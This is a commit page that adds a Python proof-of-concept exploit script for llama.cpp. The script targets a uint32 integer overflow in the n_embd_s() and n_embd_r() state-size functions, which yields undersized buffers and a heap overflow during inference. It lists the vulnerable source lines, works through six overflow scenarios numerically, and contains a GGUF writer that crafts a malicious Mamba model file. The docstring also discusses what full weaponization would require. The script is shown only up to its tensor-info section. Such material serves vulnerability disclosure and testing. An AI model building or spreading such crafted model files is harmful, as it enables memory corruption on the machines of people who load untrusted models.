Upload poc_hparams_overflow.py with huggingface_hub
Browse files- poc_hparams_overflow.py +620 -0
poc_hparams_overflow.py
ADDED
|
@@ -0,0 +1,620 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python3
|
| 2 |
+
"""
|
| 3 |
+
PoC: uint32_t integer overflow in llama_hparams::n_embd_s() and n_embd_r()
|
| 4 |
+
=====================================================================================
|
| 5 |
+
|
| 6 |
+
VULNERABILITY SUMMARY:
|
| 7 |
+
In llama.cpp, the functions n_embd_s() and n_embd_r() in src/llama-hparams.cpp
|
| 8 |
+
compute recurrent state buffer sizes using uint32_t arithmetic. When the product
|
| 9 |
+
of attacker-controlled GGUF metadata values exceeds 2^32, silent integer overflow
|
| 10 |
+
causes allocation of undersized buffers. Subsequent writes to these buffers during
|
| 11 |
+
inference cause heap buffer overflow.
|
| 12 |
+
|
| 13 |
+
AFFECTED FUNCTIONS (src/llama-hparams.cpp):
|
| 14 |
+
1. n_embd_s() line 158: return n_embd * wkv_head_size; [RWKV6/RWKV7]
|
| 15 |
+
2. n_embd_s() line 169: return ssm_d_state * ssm_d_inner; [Mamba/Mamba2]
|
| 16 |
+
3. n_embd_s() line 165: return n_embd_head_kda * n_embd_head_kda * n_head(); [Kimi KDA]
|
| 17 |
+
4. n_embd_r() line 134: return token_shift_count * n_embd; [RWKV6/RWKV7]
|
| 18 |
+
5. n_embd_r() line 139: return n_embd * (n_shortconv_l_cache-1); [LFM2]
|
| 19 |
+
6. n_embd_r() line 152: return (ssm_d_conv-1) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); [Mamba]
|
| 20 |
+
|
| 21 |
+
ALLOCATION SITE (src/llama-memory-recurrent.cpp lines 94-95):
|
| 22 |
+
ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size);
|
| 23 |
+
ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size);
|
| 24 |
+
|
| 25 |
+
Note: n_embd_r() returns uint32_t, mem_size is uint32_t, so the multiplication
|
| 26 |
+
hparams.n_embd_r()*mem_size is ALSO in uint32_t and may overflow again before
|
| 27 |
+
being widened to int64_t for ggml_new_tensor_1d.
|
| 28 |
+
|
| 29 |
+
NO INPUT VALIDATION:
|
| 30 |
+
There are no range checks on wkv_head_size, ssm_d_state, ssm_d_inner,
|
| 31 |
+
n_shortconv_l_cache, n_embd_head_kda, or token_shift_count. Values are read
|
| 32 |
+
directly from untrusted GGUF metadata into uint32_t fields.
|
| 33 |
+
|
| 34 |
+
TRIGGER SEQUENCE:
|
| 35 |
+
1. llama_load_model_from_file() -> load_hparams() reads overflow-inducing values
|
| 36 |
+
2. load_tensors() loads model weights (tensors sized with int64_t, no overflow there)
|
| 37 |
+
3. llama_new_context_with_model() -> create_memory() -> llama_memory_recurrent()
|
| 38 |
+
calls n_embd_s() / n_embd_r() with uint32_t overflow -> undersized allocation
|
| 39 |
+
4. During inference, recurrent state is written into the undersized buffer -> HEAP OOB
|
| 40 |
+
|
| 41 |
+
ASAN DETECTION:
|
| 42 |
+
Yes, ASan would detect the heap-buffer-overflow during inference when the recurrent
|
| 43 |
+
state write exceeds the allocated buffer. The overflow at step 3 is silent (no UB
|
| 44 |
+
in C/C++ for unsigned wrap-around), but the resulting OOB write at step 4 is
|
| 45 |
+
detected by ASan.
|
| 46 |
+
|
| 47 |
+
This script generates a minimal GGUF file demonstrating the vulnerability.
|
| 48 |
+
"""
|
| 49 |
+
|
| 50 |
+
import struct
|
| 51 |
+
import sys
|
| 52 |
+
import os
|
| 53 |
+
import numpy as np
|
| 54 |
+
|
| 55 |
+
# --------------------------------------------------------------------------
|
| 56 |
+
# Constants from GGUF specification
|
| 57 |
+
# --------------------------------------------------------------------------
|
| 58 |
+
GGUF_MAGIC = 0x46554747 # "GGUF" as uint32 little-endian (bytes: 47 47 55 46)
|
| 59 |
+
GGUF_VERSION = 3
|
| 60 |
+
|
| 61 |
+
# GGUF value types
|
| 62 |
+
GGUF_TYPE_UINT32 = 4
|
| 63 |
+
GGUF_TYPE_FLOAT32 = 6
|
| 64 |
+
GGUF_TYPE_STRING = 8
|
| 65 |
+
GGUF_TYPE_ARRAY = 9
|
| 66 |
+
GGUF_TYPE_UINT8 = 0
|
| 67 |
+
|
| 68 |
+
# GGML tensor types
|
| 69 |
+
GGML_TYPE_F32 = 0
|
| 70 |
+
|
| 71 |
+
UINT32_MAX = 0xFFFFFFFF
|
| 72 |
+
|
| 73 |
+
|
| 74 |
+
def uint32_overflow(val):
|
| 75 |
+
"""Simulate uint32_t overflow (C unsigned wrap-around)."""
|
| 76 |
+
return val & UINT32_MAX
|
| 77 |
+
|
| 78 |
+
|
| 79 |
+
def analyze_overflow_scenarios():
|
| 80 |
+
"""Print analysis of all overflow scenarios."""
|
| 81 |
+
print("=" * 78)
|
| 82 |
+
print("OVERFLOW ANALYSIS FOR ALL VULNERABLE FUNCTIONS")
|
| 83 |
+
print("=" * 78)
|
| 84 |
+
|
| 85 |
+
# --- Scenario 1: RWKV6 n_embd_s() ---
|
| 86 |
+
print("\n--- Scenario 1: RWKV6 n_embd_s() = n_embd * wkv_head_size ---")
|
| 87 |
+
n_embd = 65537
|
| 88 |
+
wkv_head_size = 65537
|
| 89 |
+
correct = n_embd * wkv_head_size
|
| 90 |
+
overflowed = uint32_overflow(correct)
|
| 91 |
+
print(f" n_embd = {n_embd}")
|
| 92 |
+
print(f" wkv_head_size = {wkv_head_size}")
|
| 93 |
+
print(f" Correct product = {correct} (0x{correct:X})")
|
| 94 |
+
print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
|
| 95 |
+
print(f" Ratio = {correct / overflowed:.1f}x undersized")
|
| 96 |
+
print(f" Correct buffer (1 seq, f32) = {correct * 4 / (1024**2):.1f} MiB")
|
| 97 |
+
print(f" Overflow buffer (1 seq, f32) = {overflowed * 4 / (1024**2):.1f} MiB")
|
| 98 |
+
|
| 99 |
+
# --- Scenario 2: Mamba n_embd_s() ---
|
| 100 |
+
print("\n--- Scenario 2: Mamba n_embd_s() = ssm_d_state * ssm_d_inner ---")
|
| 101 |
+
n_embd_mamba = 2
|
| 102 |
+
ssm_d_inner = 2 * n_embd_mamba # constraint: d_inner = 2 * n_embd
|
| 103 |
+
ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2 # just enough to overflow
|
| 104 |
+
correct = ssm_d_state * ssm_d_inner
|
| 105 |
+
overflowed = uint32_overflow(correct)
|
| 106 |
+
print(f" n_embd = {n_embd_mamba}")
|
| 107 |
+
print(f" ssm_d_inner = {ssm_d_inner} (= 2 * n_embd)")
|
| 108 |
+
print(f" ssm_d_state = {ssm_d_state}")
|
| 109 |
+
print(f" Correct product = {correct} (0x{correct:X})")
|
| 110 |
+
print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
|
| 111 |
+
print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized")
|
| 112 |
+
|
| 113 |
+
# --- Scenario 3: Kimi KDA n_embd_s() ---
|
| 114 |
+
print("\n--- Scenario 3: Kimi KDA n_embd_s() = n_embd_head_kda^2 * n_head ---")
|
| 115 |
+
n_embd_head_kda = 11586 # 11586^2 * 32 > 2^32
|
| 116 |
+
n_head = 32
|
| 117 |
+
correct = n_embd_head_kda * n_embd_head_kda * n_head
|
| 118 |
+
overflowed = uint32_overflow(correct)
|
| 119 |
+
print(f" n_embd_head_kda = {n_embd_head_kda}")
|
| 120 |
+
print(f" n_head = {n_head}")
|
| 121 |
+
print(f" Correct product = {correct} (0x{correct:X})")
|
| 122 |
+
print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
|
| 123 |
+
if overflowed > 0:
|
| 124 |
+
print(f" Ratio = {correct / overflowed:.1f}x undersized")
|
| 125 |
+
else:
|
| 126 |
+
print(f" Wraps to ZERO -- ggml_new_tensor_1d with size 0!")
|
| 127 |
+
|
| 128 |
+
# --- Scenario 4: LFM2 n_embd_r() ---
|
| 129 |
+
print("\n--- Scenario 4: LFM2 n_embd_r() = n_embd * (n_shortconv_l_cache - 1) ---")
|
| 130 |
+
n_embd_lfm = 4096
|
| 131 |
+
n_shortconv_l_cache = 1048578 # n_embd * (1048578-1) = 4096 * 1048577 > 2^32
|
| 132 |
+
correct = n_embd_lfm * (n_shortconv_l_cache - 1)
|
| 133 |
+
overflowed = uint32_overflow(correct)
|
| 134 |
+
print(f" n_embd = {n_embd_lfm}")
|
| 135 |
+
print(f" n_shortconv_l_cache = {n_shortconv_l_cache}")
|
| 136 |
+
print(f" Correct product = {correct} (0x{correct:X})")
|
| 137 |
+
print(f" uint32 overflow = {overflowed} (0x{overflowed:X})")
|
| 138 |
+
print(f" Ratio = {correct / overflowed:.1f}x undersized")
|
| 139 |
+
|
| 140 |
+
# --- Scenario 5: Mamba n_embd_r() complex ---
|
| 141 |
+
print("\n--- Scenario 5: Mamba n_embd_r() = (d_conv-1)*(d_inner + 2*n_group*d_state) ---")
|
| 142 |
+
ssm_d_conv = 5
|
| 143 |
+
ssm_d_inner_r = 512
|
| 144 |
+
ssm_n_group = 32768
|
| 145 |
+
ssm_d_state_r = 32769
|
| 146 |
+
subexpr = ssm_d_inner_r + uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
|
| 147 |
+
correct_sub = ssm_d_inner_r + 2 * ssm_n_group * ssm_d_state_r
|
| 148 |
+
correct = (ssm_d_conv - 1) * correct_sub
|
| 149 |
+
overflowed_sub = uint32_overflow(2 * ssm_n_group * ssm_d_state_r)
|
| 150 |
+
overflowed = uint32_overflow((ssm_d_conv - 1) * uint32_overflow(ssm_d_inner_r + overflowed_sub))
|
| 151 |
+
print(f" ssm_d_conv = {ssm_d_conv}")
|
| 152 |
+
print(f" ssm_d_inner = {ssm_d_inner_r}")
|
| 153 |
+
print(f" ssm_n_group = {ssm_n_group}")
|
| 154 |
+
print(f" ssm_d_state = {ssm_d_state_r}")
|
| 155 |
+
print(f" 2*n_group*d_state = {2*ssm_n_group*ssm_d_state_r} (correct)")
|
| 156 |
+
print(f" 2*n_group*d_state = {overflowed_sub} (uint32 overflow)")
|
| 157 |
+
print(f" Full correct = {correct}")
|
| 158 |
+
print(f" Full overflowed = {overflowed}")
|
| 159 |
+
|
| 160 |
+
# --- Scenario 6: Double overflow at allocation site ---
|
| 161 |
+
print("\n--- Scenario 6: Double overflow at allocation site (line 94-95) ---")
|
| 162 |
+
print(" Even if n_embd_s() doesn't overflow, the multiplication")
|
| 163 |
+
print(" n_embd_s() * mem_size on line 95 is ALSO in uint32_t!")
|
| 164 |
+
n_embd_s_val = 65536 # legitimate n_embd_s value
|
| 165 |
+
mem_size = 65537
|
| 166 |
+
correct = n_embd_s_val * mem_size
|
| 167 |
+
overflowed = uint32_overflow(correct)
|
| 168 |
+
print(f" n_embd_s() = {n_embd_s_val}")
|
| 169 |
+
print(f" mem_size = {mem_size}")
|
| 170 |
+
print(f" Correct = {correct} (0x{correct:X})")
|
| 171 |
+
print(f" Overflowed = {overflowed} (0x{overflowed:X})")
|
| 172 |
+
print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized")
|
| 173 |
+
|
| 174 |
+
print("\n" + "=" * 78)
|
| 175 |
+
|
| 176 |
+
|
| 177 |
+
# --------------------------------------------------------------------------
|
| 178 |
+
# GGUF binary writer (minimal, hand-crafted)
|
| 179 |
+
# --------------------------------------------------------------------------
|
| 180 |
+
def write_gguf_string(f, s):
|
| 181 |
+
"""Write a GGUF string (uint64 length + bytes, no null terminator)."""
|
| 182 |
+
encoded = s.encode('utf-8')
|
| 183 |
+
f.write(struct.pack('<Q', len(encoded)))
|
| 184 |
+
f.write(encoded)
|
| 185 |
+
|
| 186 |
+
|
| 187 |
+
def write_gguf_kv_string(f, key, value):
|
| 188 |
+
"""Write a string KV pair."""
|
| 189 |
+
write_gguf_string(f, key)
|
| 190 |
+
f.write(struct.pack('<I', GGUF_TYPE_STRING))
|
| 191 |
+
write_gguf_string(f, value)
|
| 192 |
+
|
| 193 |
+
|
| 194 |
+
def write_gguf_kv_uint32(f, key, value):
|
| 195 |
+
"""Write a uint32 KV pair."""
|
| 196 |
+
write_gguf_string(f, key)
|
| 197 |
+
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
|
| 198 |
+
f.write(struct.pack('<I', value))
|
| 199 |
+
|
| 200 |
+
|
| 201 |
+
def write_gguf_kv_float32(f, key, value):
|
| 202 |
+
"""Write a float32 KV pair."""
|
| 203 |
+
write_gguf_string(f, key)
|
| 204 |
+
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
|
| 205 |
+
f.write(struct.pack('<f', value))
|
| 206 |
+
|
| 207 |
+
|
| 208 |
+
def write_gguf_kv_string_array(f, key, values):
|
| 209 |
+
"""Write a string array KV pair."""
|
| 210 |
+
write_gguf_string(f, key)
|
| 211 |
+
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
|
| 212 |
+
f.write(struct.pack('<I', GGUF_TYPE_STRING))
|
| 213 |
+
f.write(struct.pack('<Q', len(values)))
|
| 214 |
+
for v in values:
|
| 215 |
+
write_gguf_string(f, v)
|
| 216 |
+
|
| 217 |
+
|
| 218 |
+
def write_gguf_kv_float32_array(f, key, values):
|
| 219 |
+
"""Write a float32 array KV pair."""
|
| 220 |
+
write_gguf_string(f, key)
|
| 221 |
+
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
|
| 222 |
+
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
|
| 223 |
+
f.write(struct.pack('<Q', len(values)))
|
| 224 |
+
for v in values:
|
| 225 |
+
f.write(struct.pack('<f', v))
|
| 226 |
+
|
| 227 |
+
|
| 228 |
+
def write_gguf_kv_int32_array(f, key, values):
|
| 229 |
+
"""Write an int32 array KV pair."""
|
| 230 |
+
write_gguf_string(f, key)
|
| 231 |
+
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
|
| 232 |
+
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
|
| 233 |
+
f.write(struct.pack('<Q', len(values)))
|
| 234 |
+
for v in values:
|
| 235 |
+
f.write(struct.pack('<I', v))
|
| 236 |
+
|
| 237 |
+
|
| 238 |
+
def write_tensor_info(f, name, ndims, shape, dtype):
|
| 239 |
+
"""Write tensor info entry in GGUF header."""
|
| 240 |
+
write_gguf_string(f, name)
|
| 241 |
+
f.write(struct.pack('<I', ndims))
|
| 242 |
+
for dim in shape:
|
| 243 |
+
f.write(struct.pack('<Q', dim))
|
| 244 |
+
f.write(struct.pack('<I', dtype))
|
| 245 |
+
f.write(struct.pack('<Q', 0)) # offset (will be 0 for first tensor, cumulative for rest)
|
| 246 |
+
|
| 247 |
+
|
| 248 |
+
def generate_mamba_poc_gguf(output_path):
|
| 249 |
+
"""
|
| 250 |
+
Generate a minimal GGUF file targeting the Mamba architecture with
|
| 251 |
+
ssm_d_state and ssm_d_inner values chosen to overflow n_embd_s().
|
| 252 |
+
|
| 253 |
+
Due to the constraint d_inner = 2*n_embd and the fact that ssm_d_state
|
| 254 |
+
appears directly in tensor dimensions (ssm_a: {d_state, d_inner}),
|
| 255 |
+
a fully loadable PoC requires large tensors (~16GB+). This PoC creates
|
| 256 |
+
a structurally valid GGUF header demonstrating the overflow parameters.
|
| 257 |
+
Tensor data is provided as minimal stubs.
|
| 258 |
+
|
| 259 |
+
For a fully weaponized exploit, one would need to provide correctly-sized
|
| 260 |
+
tensor data, which is feasible (many real models are 16GB+) but impractical
|
| 261 |
+
for a PoC demonstration.
|
| 262 |
+
"""
|
| 263 |
+
# Overflow parameters for Mamba n_embd_s()
|
| 264 |
+
n_embd = 2
|
| 265 |
+
n_vocab = 4
|
| 266 |
+
n_layer = 1
|
| 267 |
+
ssm_d_inner = 2 * n_embd # = 4 (required: d_inner == 2*n_embd)
|
| 268 |
+
ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2 # 1073741825
|
| 269 |
+
ssm_d_conv = 4
|
| 270 |
+
ssm_dt_rank = 1
|
| 271 |
+
|
| 272 |
+
correct_n_embd_s = ssm_d_state * ssm_d_inner
|
| 273 |
+
overflowed_n_embd_s = uint32_overflow(correct_n_embd_s)
|
| 274 |
+
|
| 275 |
+
print(f"\n{'='*78}")
|
| 276 |
+
print("GENERATING MAMBA PoC GGUF FILE")
|
| 277 |
+
print(f"{'='*78}")
|
| 278 |
+
print(f" Architecture: mamba")
|
| 279 |
+
print(f" n_embd: {n_embd}")
|
| 280 |
+
print(f" n_layer: {n_layer}")
|
| 281 |
+
print(f" ssm_d_inner: {ssm_d_inner}")
|
| 282 |
+
print(f" ssm_d_state: {ssm_d_state}")
|
| 283 |
+
print(f" ssm_d_conv: {ssm_d_conv}")
|
| 284 |
+
print(f" ssm_dt_rank: {ssm_dt_rank}")
|
| 285 |
+
print(f"")
|
| 286 |
+
print(f" n_embd_s() CORRECT value: {correct_n_embd_s}")
|
| 287 |
+
print(f" n_embd_s() OVERFLOWED value: {overflowed_n_embd_s}")
|
| 288 |
+
print(f" Allocated buffer is {correct_n_embd_s / max(overflowed_n_embd_s, 1):.0f}x too small!")
|
| 289 |
+
print(f"")
|
| 290 |
+
print(f" n_embd_r() = (d_conv-1) * d_inner = {(ssm_d_conv-1) * ssm_d_inner}")
|
| 291 |
+
print(f" (n_embd_r does not overflow with these params)")
|
| 292 |
+
print()
|
| 293 |
+
|
| 294 |
+
# Define tensors needed for Mamba (per llama-arch.cpp lines 1351-1364)
|
| 295 |
+
# NOTE: Tensor shapes include d_state which makes them very large.
|
| 296 |
+
# We provide minimal stub data to demonstrate the GGUF structure.
|
| 297 |
+
tensors = []
|
| 298 |
+
tensor_data_list = []
|
| 299 |
+
|
| 300 |
+
def add_tensor(name, shape):
|
| 301 |
+
n_elements = 1
|
| 302 |
+
for d in shape:
|
| 303 |
+
n_elements *= d
|
| 304 |
+
data = np.zeros(min(n_elements, 64), dtype=np.float32) # stub: only first 64 elements
|
| 305 |
+
tensors.append((name, len(shape), shape, GGML_TYPE_F32))
|
| 306 |
+
tensor_data_list.append(data)
|
| 307 |
+
|
| 308 |
+
# Global tensors
|
| 309 |
+
add_tensor("token_embd.weight", [n_embd, n_vocab])
|
| 310 |
+
add_tensor("output_norm.weight", [n_embd])
|
| 311 |
+
add_tensor("output.weight", [n_embd, n_vocab])
|
| 312 |
+
|
| 313 |
+
# Per-layer tensors (1 layer)
|
| 314 |
+
for i in range(n_layer):
|
| 315 |
+
add_tensor(f"blk.{i}.attn_norm.weight", [n_embd])
|
| 316 |
+
add_tensor(f"blk.{i}.ssm_in.weight", [n_embd, 2 * ssm_d_inner])
|
| 317 |
+
add_tensor(f"blk.{i}.ssm_conv1d.weight", [ssm_d_conv, ssm_d_inner])
|
| 318 |
+
add_tensor(f"blk.{i}.ssm_conv1d.bias", [ssm_d_inner])
|
| 319 |
+
add_tensor(f"blk.{i}.ssm_x.weight", [ssm_d_inner, ssm_dt_rank + 2 * ssm_d_state])
|
| 320 |
+
add_tensor(f"blk.{i}.ssm_dt.weight", [ssm_dt_rank, ssm_d_inner])
|
| 321 |
+
add_tensor(f"blk.{i}.ssm_dt.bias", [ssm_d_inner])
|
| 322 |
+
add_tensor(f"blk.{i}.ssm_a", [ssm_d_state, ssm_d_inner])
|
| 323 |
+
add_tensor(f"blk.{i}.ssm_d", [ssm_d_inner])
|
| 324 |
+
add_tensor(f"blk.{i}.ssm_out.weight", [ssm_d_inner, n_embd])
|
| 325 |
+
|
| 326 |
+
# KV pairs for GGUF metadata
|
| 327 |
+
kv_pairs = []
|
| 328 |
+
n_kv = 0
|
| 329 |
+
|
| 330 |
+
# Write GGUF file
|
| 331 |
+
with open(output_path, 'wb') as f:
|
| 332 |
+
# We'll write the header later once we know the structure
|
| 333 |
+
header_pos = f.tell()
|
| 334 |
+
|
| 335 |
+
# Count KV pairs
|
| 336 |
+
# We need: general.architecture, general.name,
|
| 337 |
+
# mamba.context_length, mamba.embedding_length, mamba.block_count,
|
| 338 |
+
# mamba.ssm.conv_kernel, mamba.ssm.inner_size, mamba.ssm.state_size,
|
| 339 |
+
# mamba.ssm.time_step_rank, mamba.attention.layer_norm_rms_epsilon,
|
| 340 |
+
# tokenizer.ggml.model, tokenizer.ggml.tokens, tokenizer.ggml.scores,
|
| 341 |
+
# tokenizer.ggml.token_type
|
| 342 |
+
n_kv = 14
|
| 343 |
+
n_tensors = len(tensors)
|
| 344 |
+
|
| 345 |
+
# GGUF header
|
| 346 |
+
f.write(struct.pack('<I', GGUF_MAGIC))
|
| 347 |
+
f.write(struct.pack('<I', GGUF_VERSION))
|
| 348 |
+
f.write(struct.pack('<Q', n_tensors))
|
| 349 |
+
f.write(struct.pack('<Q', n_kv))
|
| 350 |
+
|
| 351 |
+
# KV data
|
| 352 |
+
write_gguf_kv_string(f, "general.architecture", "mamba")
|
| 353 |
+
write_gguf_kv_string(f, "general.name", "overflow-poc-mamba")
|
| 354 |
+
write_gguf_kv_uint32(f, "mamba.context_length", 2048)
|
| 355 |
+
write_gguf_kv_uint32(f, "mamba.embedding_length", n_embd)
|
| 356 |
+
write_gguf_kv_uint32(f, "mamba.block_count", n_layer)
|
| 357 |
+
write_gguf_kv_uint32(f, "mamba.ssm.conv_kernel", ssm_d_conv)
|
| 358 |
+
write_gguf_kv_uint32(f, "mamba.ssm.inner_size", ssm_d_inner)
|
| 359 |
+
write_gguf_kv_uint32(f, "mamba.ssm.state_size", ssm_d_state)
|
| 360 |
+
write_gguf_kv_uint32(f, "mamba.ssm.time_step_rank", ssm_dt_rank)
|
| 361 |
+
write_gguf_kv_float32(f, "mamba.attention.layer_norm_rms_epsilon", 1e-5)
|
| 362 |
+
|
| 363 |
+
# Minimal tokenizer
|
| 364 |
+
write_gguf_kv_string(f, "tokenizer.ggml.model", "gpt2")
|
| 365 |
+
tokens = ["<pad>", "<eos>", "a", "b"]
|
| 366 |
+
write_gguf_kv_string_array(f, "tokenizer.ggml.tokens", tokens)
|
| 367 |
+
write_gguf_kv_float32_array(f, "tokenizer.ggml.scores", [0.0] * len(tokens))
|
| 368 |
+
write_gguf_kv_int32_array(f, "tokenizer.ggml.token_type", [0] * len(tokens))
|
| 369 |
+
|
| 370 |
+
# Tensor info
|
| 371 |
+
# NOTE: We write the correct shapes (which are very large for ssm_a, ssm_x)
|
| 372 |
+
# but only provide stub data. This makes the file small but structurally valid.
|
